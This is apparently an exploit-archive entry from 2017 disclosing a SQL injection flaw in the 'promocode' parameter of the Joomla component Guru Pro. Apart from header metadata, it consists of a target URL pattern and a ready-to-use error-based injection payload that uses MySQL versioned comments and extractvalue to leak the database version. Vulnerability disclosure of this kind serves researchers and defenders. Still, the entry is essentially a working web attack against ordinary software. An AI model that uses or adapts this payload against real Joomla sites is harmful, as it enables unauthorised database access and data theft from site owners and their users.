26 lines
No EOL
795 B
Text
26 lines
No EOL
795 B
Text
# # # # #
|
|
# Exploit Title: Joomla! Component Guru Pro 'promocode'- SQL Injection
|
|
# Dork: N/A
|
|
# Date: 17.12.2017
|
|
# Vendor Homepage: https://www.ijoomla.com/
|
|
# Software Link: https://www.ijoomla.com/component/digistore/products/47-joomla-add-ons/119-guru-pro/189?Itemid=189
|
|
# Version: N/A
|
|
# Category: Webapps
|
|
# Tested on: WiN7_x64/KaLiLinuX_x64
|
|
# CVE: N/A
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Social: @ihsansencan
|
|
# # # # #
|
|
# Description:
|
|
# The vulnerability allows an attacker to inject sql commands....
|
|
#
|
|
# Proof of Concept:
|
|
#
|
|
# 1)
|
|
# http://localhost/[PATH]/guruBuy?promocode=[SQL]
|
|
#
|
|
# '%20/*!50000Procedure*/%20/*!50000Analyse*/%20(extractvalue(0%2c/*!50000concat*/(0x27%2c0x496873616e2053656e63616e%2c0x3a%2c@@version))%2c0)%2d%2d%200x2d
|
|
#
|
|
# # # # # |